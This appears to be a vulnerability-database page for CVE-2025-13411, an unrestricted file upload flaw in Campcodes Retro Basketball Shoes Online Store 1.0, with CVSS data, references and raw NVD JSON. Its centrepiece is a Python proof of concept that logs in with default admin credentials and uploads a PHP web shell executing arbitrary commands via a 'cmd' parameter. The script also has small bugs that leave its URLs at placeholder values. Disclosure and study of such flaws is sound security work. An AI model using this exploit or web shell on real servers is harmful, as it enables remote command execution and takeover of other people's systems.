CVE-2025-13411

Description

A vulnerability was found in Campcodes Retro Basketball Shoes Online Store 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/admin_football.php. Performing a manipulation of the argument product_image results in unrestricted upload. The attack is possible to be carried out remotely. The exploit has been made public and could be used.

CVSS Details

CVSS Score

4.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:campcodes:retro_basketball_shoes_online_store:1.0:*:*:*:*:*:*:* - VULNERABLE

Campcodes Retro Basketball Shoes Online Store 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-13411 PoC - Campcodes Retro Basketball Shoes Online Store Unrestricted File Upload
# Target: /admin/admin_football.php
# Vulnerability: Unrestricted file upload via product_image parameter

TARGET_URL = "http://target.com/admin/admin_football.php"
LOGIN_URL = "http://target.com/admin/login.php"
USERNAME = "admin"
PASSWORD = "admin"

def login(session):
    """Login to admin panel with valid credentials"""
    login_data = {
        "username": USERNAME,
        "password": PASSWORD,
        "submit": "Login"
    }
    response = session.post(LOGIN_URL, data=login_data)
    return "admin" in response.text or response.status_code == 200

def upload_shell(session, webshell_content):
    """Upload malicious PHP shell via product_image parameter"""
    files = {
        "product_image": ("shell.php", webshell_content, "image/php")
    }
    data = {
        "submit": "Upload",
        "product_name": "Test Product",
        "product_price": "100"
    }
    response = session.post(TARGET_URL, files=files, data=data)
    return response.status_code == 200

def main():
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        sys.exit(1)
    
    target = sys.argv[1]
    TARGET_URL = f"{target}/admin/admin_football.php"
    LOGIN_URL = f"{target}/admin/login.php"
    
    session = requests.Session()
    
    print("[*] Attempting to login to admin panel...")
    if not login(session):
        print("[-] Login failed. Check credentials.")
        sys.exit(1)
    
    print("[+] Login successful!")
    
    # Create malicious PHP shell
    webshell = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>"
    
    print("[*] Uploading malicious shell...")
    if upload_shell(session, webshell):
        print("[+] Shell uploaded successfully!")
        print("[*] Access shell at: {target}/uploads/shell.php?cmd=whoami")
    else:
        print("[-] Upload failed.")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13411
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13411
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13411/
[4] VulDB https://vuldb.com/cve/CVE-2025-13411
[5] https://github.com/laosijivul/cve/issues/2
[6] https://vuldb.com/?ctiid.332938
[7] https://vuldb.com/?id.332938
[8] https://vuldb.com/?submit.693697
[9] https://www.campcodes.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13411", "sourceIdentifier": "[email protected]", "published": "2025-11-19T21:15:49.813", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in Campcodes Retro Basketball Shoes Online Store 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/admin_football.php. Performing a manipulation of the argument product_image results in unrestricted upload. The attack is possible to be carried out remotely. The exploit has been made public and could be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-434"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:campcodes:retro_basketball_shoes_online_store:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "A09368E4-676B-4F86-B3BC-C9EEE1F4C280"}]}]}], "references": [{"url": "https://github.com/laosijivul/cve/issues/2", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.332938", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.332938", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.693697", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.campcodes.com/", "source": "[email protected]", "tags": ["Product"]}]}}